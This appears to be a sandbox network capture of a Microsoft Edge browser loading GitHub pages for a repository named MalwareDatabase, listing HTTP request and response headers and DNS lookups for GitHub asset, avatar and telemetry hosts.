last-modified: Mon, 22 Apr 2024 19:56:03 GMT
etag: 0x8DC63063DAD78E6
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Mon, 13 May 2024 19:48:29 GMT
age: 1024377
x-served-by: cache-iad-kcgs7200060-IAD, cache-lcy-eglc8600083-LCY
x-cache: HIT, HIT
x-cache-hits: 74, 2299
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: e4ad46543fa15be38272da87387044bdbee1fce2
content-length: 5441
-
GEThttps://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_Heading_Heading_js-node_modules_primer_react_lib-es-09461f-b6800c935d2b.jsmsedge.exeRemote address:185.199.108.154:443RequestGET /assets/vendors-node_modules_primer_react_lib-esm_Heading_Heading_js-node_modules_primer_react_lib-es-09461f-b6800c935d2b.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase/tree/master/enderware
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Sun, 28 Apr 2024 23:11:43 GMT
etag: 0x8DC67D891C1636A
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Mon, 13 May 2024 19:48:29 GMT
age: 553462
x-served-by: cache-iad-kiad7000153-IAD, cache-lcy-eglc8600083-LCY
x-cache: HIT, HIT
x-cache-hits: 47, 2356
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 43e7e57e50826b164f42ce679430ecaabd09198c
content-length: 6102
-
GEThttps://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_Label_Label_js-node_modules_primer_react_lib-esm_Se-443e5e-732d80415edc.jsmsedge.exeRemote address:185.199.108.154:443RequestGET /assets/vendors-node_modules_primer_react_lib-esm_Label_Label_js-node_modules_primer_react_lib-esm_Se-443e5e-732d80415edc.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase/tree/master/enderware
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Mon, 06 May 2024 16:09:48 GMT
etag: 0x8DC6DE6F40BA781
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Mon, 13 May 2024 19:48:29 GMT
age: 520675
x-served-by: cache-iad-kiad7000103-IAD, cache-lcy-eglc8600083-LCY
x-cache: HIT, HIT
x-cache-hits: 31, 2189
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 5e13d021b0c97e80d471492d966e4cdaa4b72d1b
content-length: 10541
-
GEThttps://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_AvatarStack_AvatarStack_js-node_modules_primer_reac-6dc608-b1ae62f152fd.jsmsedge.exeRemote address:185.199.108.154:443RequestGET /assets/vendors-node_modules_primer_react_lib-esm_AvatarStack_AvatarStack_js-node_modules_primer_reac-6dc608-b1ae62f152fd.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase/tree/master/enderware
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Thu, 18 Apr 2024 03:20:17 GMT
etag: 0x8DC5F5678894F01
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Mon, 13 May 2024 19:48:29 GMT
age: 520676
x-served-by: cache-iad-kcgs7200078-IAD, cache-lcy-eglc8600083-LCY
x-cache: HIT, HIT
x-cache-hits: 68, 2246
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 722b3cba8e909fa0fdcf271ad45c41fc01a1af0a
content-length: 5033
-
GEThttps://github.githubassets.com/assets/ui_packages_react-core_register-app_ts-1b1f53d95ef9.jsmsedge.exeRemote address:185.199.108.154:443RequestGET /assets/ui_packages_react-core_register-app_ts-1b1f53d95ef9.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase/tree/master/enderware
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Wed, 01 May 2024 19:39:12 GMT
etag: 0x8DC6A1660D3651C
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Mon, 13 May 2024 19:48:29 GMT
age: 952278
x-served-by: cache-iad-kjyo7100060-IAD, cache-lcy-eglc8600083-LCY
x-cache: HIT, HIT
x-cache-hits: 51, 2512
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 310509c50b0aa96ef6608b34b2d302d8f898cf12
content-length: 7841
-
GEThttps://github.githubassets.com/assets/ui_packages_commit-attribution_index_ts-ui_packages_commit-checks-status_index_ts-ui_packages-59a8e3-d8a8a30fe2d7.jsmsedge.exeRemote address:185.199.108.154:443RequestGET /assets/ui_packages_commit-attribution_index_ts-ui_packages_commit-checks-status_index_ts-ui_packages-59a8e3-d8a8a30fe2d7.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase/tree/master/enderware
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Thu, 09 May 2024 18:20:39 GMT
etag: 0x8DC7054BACA7E0E
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Mon, 13 May 2024 19:48:29 GMT
age: 257557
x-served-by: cache-iad-kiad7000123-IAD, cache-lcy-eglc8600083-LCY
x-cache: HIT, HIT
x-cache-hits: 7, 2202
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 8f85564ba2acc5a5b9efde0e7b7281c1495382d5
content-length: 9418
-
Remote address:185.199.108.154:443RequestGET /assets/react-code-view-c1d9359a2889.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase/tree/master/enderware
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Wed, 08 May 2024 02:59:27 GMT
etag: 0x8DC6F0ADFE0B497
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Mon, 13 May 2024 19:48:29 GMT
age: 400219
x-served-by: cache-iad-kiad7000136-IAD, cache-lcy-eglc8600083-LCY
x-cache: HIT, HIT
x-cache-hits: 41, 2184
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 57db3a027cc8602437bdaa699a1bee537388ef22
content-length: 83476
-
Remote address:185.199.108.133:443RequestGET /u/44542704?s=64&v=4 HTTP/2.0
host: avatars.githubusercontent.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-security-policy: default-src 'none'
content-type: image/png
etag: "9a2efe452d138368bb47150077cf3966a0e8a699137cd76496cedb32fa6eabb0"
last-modified: Fri, 14 Feb 2020 15:58:52 GMT
strict-transport-security: max-age=31557600
timing-allow-origin: https://github.com
x-content-type-options: nosniff
x-frame-options: deny
x-github-tenant:
x-xss-protection: 1; mode=block
x-github-request-id: 1A6C:36E60:79D849:965321:662760B9
accept-ranges: bytes
date: Mon, 13 May 2024 19:48:21 GMT
via: 1.1 varnish
x-served-by: cache-lcy-eglc8600078-LCY
x-cache: HIT
x-cache-hits: 0
x-timer: S1715629702.512351,VS0,VE2
access-control-allow-origin: *
cross-origin-resource-policy: cross-origin
x-fastly-request-id: 9864e9bf44bfab9536daa4dd0367de34f58caa64
expires: Mon, 13 May 2024 19:53:21 GMT
source-age: 1773003
vary: Authorization,Accept-Encoding
content-length: 3043
-
Remote address:185.199.108.133:443RequestGET /u/63458929?s=64&v=4 HTTP/2.0
host: avatars.githubusercontent.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-security-policy: default-src 'none'
content-type: image/png
etag: "bbd78d1ccf4743a85b2c5003d9d579945b57235f0c8533ffd5c94ea947c970c8"
last-modified: Sun, 19 Mar 2023 14:46:52 GMT
strict-transport-security: max-age=31557600
timing-allow-origin: https://github.com
x-content-type-options: nosniff
x-frame-options: deny
x-github-tenant:
x-xss-protection: 1; mode=block
x-github-request-id: 8C56:3BC5F2:4871EE:5A22A0:663B2C93
accept-ranges: bytes
date: Mon, 13 May 2024 19:48:21 GMT
via: 1.1 varnish
x-served-by: cache-lcy-eglc8600078-LCY
x-cache: HIT
x-cache-hits: 0
x-timer: S1715629702.513040,VS0,VE1
access-control-allow-origin: *
cross-origin-resource-policy: cross-origin
x-fastly-request-id: 4da5f3d16e663fbb4b8ba101b7cdea23808b1dcd
expires: Mon, 13 May 2024 19:53:21 GMT
source-age: 475633
vary: Authorization,Accept-Encoding
content-length: 2493
-
Remote address:185.199.108.133:443RequestGET /u/51242428?s=64&v=4 HTTP/2.0
host: avatars.githubusercontent.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-security-policy: default-src 'none'
content-type: image/png
etag: "e25efc2f3c542a995df70f85198b7fd6184be4700ec9756e00c0a8fd9e7a124c"
last-modified: Tue, 22 Apr 2014 06:42:31 GMT
strict-transport-security: max-age=31557600
timing-allow-origin: https://github.com
x-content-type-options: nosniff
x-frame-options: deny
x-github-tenant:
x-xss-protection: 1; mode=block
x-github-request-id: 082C:2492E6:5E510:7D6AC:66275F3C
accept-ranges: bytes
date: Mon, 13 May 2024 19:48:21 GMT
via: 1.1 varnish
x-served-by: cache-lcy-eglc8600078-LCY
x-cache: HIT
x-cache-hits: 0
x-timer: S1715629702.512486,VS0,VE2
access-control-allow-origin: *
cross-origin-resource-policy: cross-origin
x-fastly-request-id: fdcd318f673fdff459f6ffae9657b9aac024983b
expires: Mon, 13 May 2024 19:53:21 GMT
source-age: 1773385
vary: Authorization,Accept-Encoding
content-length: 1505
-
Remote address:185.199.108.133:443RequestGET /u/39349444?s=64&v=4 HTTP/2.0
host: avatars.githubusercontent.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-security-policy: default-src 'none'
content-type: image/jpeg
etag: "bcbeb95c3f21364aef292d9e6c261374e079265660dda6145e13de8a5be8546f"
last-modified: Tue, 19 May 2020 23:35:43 GMT
strict-transport-security: max-age=31557600
timing-allow-origin: https://github.com
x-content-type-options: nosniff
x-frame-options: deny
x-github-tenant:
x-xss-protection: 1; mode=block
x-github-request-id: 91C4:16D76:54314B:692C9B:6639F792
accept-ranges: bytes
date: Mon, 13 May 2024 19:48:21 GMT
via: 1.1 varnish
x-served-by: cache-lcy-eglc8600078-LCY
x-cache: HIT
x-cache-hits: 0
x-timer: S1715629702.512970,VS0,VE1
access-control-allow-origin: *
cross-origin-resource-policy: cross-origin
x-fastly-request-id: 6081c63e4683b38b03cc7711d216ecc62a22f2d1
expires: Mon, 13 May 2024 19:53:21 GMT
source-age: 554736
vary: Authorization,Accept-Encoding
content-length: 1590
-
Remote address:185.199.108.133:443RequestGET /u/17717494?s=64&v=4 HTTP/2.0
host: avatars.githubusercontent.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-security-policy: default-src 'none'
content-type: image/jpeg
etag: "d5c09e3ef46dc6f86f1412a05a1a35bf9d8f63d9dc236affaedec77cebc9749e"
last-modified: Tue, 12 Jul 2022 18:15:38 GMT
strict-transport-security: max-age=31557600
timing-allow-origin: https://github.com
x-content-type-options: nosniff
x-frame-options: deny
x-github-tenant:
x-xss-protection: 1; mode=block
x-github-request-id: 9F5C:A292E:159658:1A98AE:6639F795
accept-ranges: bytes
date: Mon, 13 May 2024 19:48:21 GMT
via: 1.1 varnish
x-served-by: cache-lcy-eglc8600078-LCY
x-cache: HIT
x-cache-hits: 0
x-timer: S1715629702.577405,VS0,VE2
access-control-allow-origin: *
cross-origin-resource-policy: cross-origin
x-fastly-request-id: 9095c924f03cc55aa9f956ccebdbfd5742f24a4c
expires: Mon, 13 May 2024 19:53:21 GMT
source-age: 554736
vary: Authorization,Accept-Encoding
content-length: 1957
-
Remote address:185.199.108.133:443RequestGET /u/42248228?s=64&v=4 HTTP/2.0
host: avatars.githubusercontent.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-security-policy: default-src 'none'
content-type: image/png
etag: "bcc9f35f4a15a3090f3b1adfdb7cfb0556b93a44cdde6b1d14c5aa9d81f36a38"
last-modified: Sun, 27 Dec 2020 15:39:11 GMT
strict-transport-security: max-age=31557600
timing-allow-origin: https://github.com
x-content-type-options: nosniff
x-frame-options: deny
x-github-tenant:
x-xss-protection: 1; mode=block
x-github-request-id: 4B8E:3313CA:1E026:28CD2:662760B5
accept-ranges: bytes
date: Mon, 13 May 2024 19:48:21 GMT
via: 1.1 varnish
x-served-by: cache-lcy-eglc8600078-LCY
x-cache: HIT
x-cache-hits: 0
x-timer: S1715629702.577501,VS0,VE2
access-control-allow-origin: *
cross-origin-resource-policy: cross-origin
x-fastly-request-id: 1c5201466d13c631f6ecf210966e41018035afca
expires: Mon, 13 May 2024 19:53:21 GMT
source-age: 1773002
vary: Authorization,Accept-Encoding
content-length: 6047
-
Remote address:185.199.108.133:443RequestGET /u/44542704?v=4&size=40 HTTP/2.0
host: avatars.githubusercontent.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-security-policy: default-src 'none'
content-type: image/png
etag: "d49ce3184891e8e0e902596e2f95df08a2f1c8418a4a1f671c1685f3ed3398cb"
last-modified: Fri, 14 Feb 2020 15:58:52 GMT
strict-transport-security: max-age=31557600
timing-allow-origin: https://github.com
x-content-type-options: nosniff
x-frame-options: deny
x-github-tenant:
x-xss-protection: 1; mode=block
x-github-request-id: CE00:331AC1:85DD5:AC400:6633648F
accept-ranges: bytes
date: Mon, 13 May 2024 19:48:22 GMT
via: 1.1 varnish
x-served-by: cache-lcy-eglc8600078-LCY
x-cache: HIT
x-cache-hits: 0
x-timer: S1715629703.607681,VS0,VE1
access-control-allow-origin: *
cross-origin-resource-policy: cross-origin
x-fastly-request-id: ff998186a9102165f8ae2962342fe1bdeb52f074
expires: Mon, 13 May 2024 19:53:22 GMT
source-age: 985591
vary: Authorization,Accept-Encoding
content-length: 1883
-
Remote address:8.8.8.8:53Requestgithub-cloud.s3.amazonaws.comIN AResponsegithub-cloud.s3.amazonaws.comIN CNAMEs3-1-w.amazonaws.coms3-1-w.amazonaws.comIN CNAMEs3-w.us-east-1.amazonaws.coms3-w.us-east-1.amazonaws.comIN A54.231.165.193s3-w.us-east-1.amazonaws.comIN A52.216.161.107s3-w.us-east-1.amazonaws.comIN A16.182.71.241s3-w.us-east-1.amazonaws.comIN A52.216.40.217s3-w.us-east-1.amazonaws.comIN A52.217.143.33s3-w.us-east-1.amazonaws.comIN A54.231.200.1s3-w.us-east-1.amazonaws.comIN A52.216.187.27s3-w.us-east-1.amazonaws.comIN A52.216.141.196
-
Remote address:8.8.8.8:53Requestuser-images.githubusercontent.comIN AResponseuser-images.githubusercontent.comIN A185.199.108.133user-images.githubusercontent.comIN A185.199.109.133user-images.githubusercontent.comIN A185.199.110.133user-images.githubusercontent.comIN A185.199.111.133
-
Remote address:8.8.8.8:53Requestcamo.githubusercontent.comIN AResponsecamo.githubusercontent.comIN A185.199.110.133camo.githubusercontent.comIN A185.199.111.133camo.githubusercontent.comIN A185.199.109.133camo.githubusercontent.comIN A185.199.108.133
-
Remote address:8.8.8.8:53Requestcamo.githubusercontent.comIN AResponsecamo.githubusercontent.comIN A185.199.108.133camo.githubusercontent.comIN A185.199.109.133camo.githubusercontent.comIN A185.199.110.133camo.githubusercontent.comIN A185.199.111.133
-
Remote address:8.8.8.8:53Request215.156.26.20.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request215.156.26.20.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request133.108.199.185.in-addr.arpaIN PTRResponse133.108.199.185.in-addr.arpaIN PTRcdn-185-199-108-133githubcom
-
Remote address:8.8.8.8:53Request154.108.199.185.in-addr.arpaIN PTRResponse154.108.199.185.in-addr.arpaIN PTRcdn-185-199-108-154githubcom
-
Remote address:8.8.8.8:53Request154.108.199.185.in-addr.arpaIN PTRResponse154.108.199.185.in-addr.arpaIN PTRcdn-185-199-108-154githubcom
-
GEThttps://camo.githubusercontent.com/3d2ea4e5e42309c07e7ffa02a58730c989e09d2c4ebe4e9f50651d327cdc2cd1/68747470733a2f2f6d616c7761742e63682f696d616765732f6173736574732f6d616c77617265436f6c6c656374696f6e2e706e67msedge.exeRemote address:185.199.110.133:443RequestGET /3d2ea4e5e42309c07e7ffa02a58730c989e09d2c4ebe4e9f50651d327cdc2cd1/68747470733a2f2f6d616c7761742e63682f696d616765732f6173736574732f6d616c77617265436f6c6c656374696f6e2e706e67 HTTP/2.0
host: camo.githubusercontent.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 502
content-security-policy: default-src 'none'; img-src data:; style-src 'unsafe-inline'
content-type: text/plain; charset=utf-8
server: github-camo (4b76e509)
strict-transport-security: max-age=31536000; includeSubDomains
x-content-type-options: nosniff
x-frame-options: deny
x-xss-protection: 1; mode=block
x-github-request-id: 8BEC:3DE6DA:2A3998:350541:66426E6D
accept-ranges: bytes
date: Mon, 13 May 2024 19:48:22 GMT
via: 1.1 varnish
x-served-by: cache-lcy-eglc8600026-LCY
x-cache: MISS
x-cache-hits: 0
x-timer: S1715629702.592908,VS0,VE457
x-fastly-request-id: 76b21fb82cceb8d6dbe018963662a68380cf93fb
timing-allow-origin: https://github.com
content-length: 32
-
GEThttps://camo.githubusercontent.com/3d2ea4e5e42309c07e7ffa02a58730c989e09d2c4ebe4e9f50651d327cdc2cd1/68747470733a2f2f6d616c7761742e63682f696d616765732f6173736574732f6d616c77617265436f6c6c656374696f6e2e706e67msedge.exeRemote address:185.199.110.133:443RequestGET /3d2ea4e5e42309c07e7ffa02a58730c989e09d2c4ebe4e9f50651d327cdc2cd1/68747470733a2f2f6d616c7761742e63682f696d616765732f6173736574732f6d616c77617265436f6c6c656374696f6e2e706e67 HTTP/2.0
host: camo.githubusercontent.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://github.com/Endermanch/MalwareDatabase/tree/master/enderware
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 502
content-security-policy: default-src 'none'; img-src data:; style-src 'unsafe-inline'
content-type: text/plain; charset=utf-8
server: github-camo (4b76e509)
strict-transport-security: max-age=31536000; includeSubDomains
x-content-type-options: nosniff
x-frame-options: deny
x-xss-protection: 1; mode=block
x-github-request-id: DB6E:275EFB:57C26E:6E817A:66426E89
accept-ranges: bytes
date: Mon, 13 May 2024 19:48:29 GMT
via: 1.1 varnish
x-served-by: cache-lcy-eglc8600026-LCY
x-cache: MISS
x-cache-hits: 0
x-timer: S1715629709.080788,VS0,VE387
x-fastly-request-id: 6ec6cc989e09e1e33b7590f2119efdfded5a6048
timing-allow-origin: https://github.com
content-length: 32
-
Remote address:140.82.113.22:443RequestPOST /github/collect HTTP/2.0
host: collector.github.com
content-length: 1152
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
content-type: text/plain;charset=UTF-8
accept: */*
origin: https://github.com
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _octo=GH1.1.1831426451.1715629700
cookie: logged_in=no
cookie: preferred_color_mode=light
ResponseHTTP/2.0 204
access-control-allow-methods: POST,OPTIONS
access-control-allow-headers: Content-Type
access-control-allow-credentials: true
access-control-allow-origin: *
cache-control: no-cache
x-runtime: 0.001833
strict-transport-security: max-age=631138519
x-frame-options: DENY
x-content-type-options: nosniff
x-xss-protection: 1; mode=block
x-download-options: noopen
x-permitted-cross-domain-policies: none
x-github-backend: Kubernetes
x-github-request-id: F1FB:263E81:1674B91:1E723BF:66426E86
-
Remote address:140.82.113.22:443RequestPOST /github/collect HTTP/2.0
host: collector.github.com
content-length: 1560
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
content-type: text/plain;charset=UTF-8
accept: */*
origin: https://github.com
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _octo=GH1.1.1831426451.1715629700
cookie: logged_in=no
cookie: preferred_color_mode=light
cookie: tz=UTC
ResponseHTTP/2.0 204
access-control-allow-methods: POST,OPTIONS
access-control-allow-headers: Content-Type
access-control-allow-credentials: true
access-control-allow-origin: *
cache-control: no-cache
x-runtime: 0.002094
strict-transport-security: max-age=631138519
x-frame-options: DENY
x-content-type-options: nosniff
x-xss-protection: 1; mode=block
x-download-options: noopen
x-permitted-cross-domain-policies: none
x-github-backend: Kubernetes
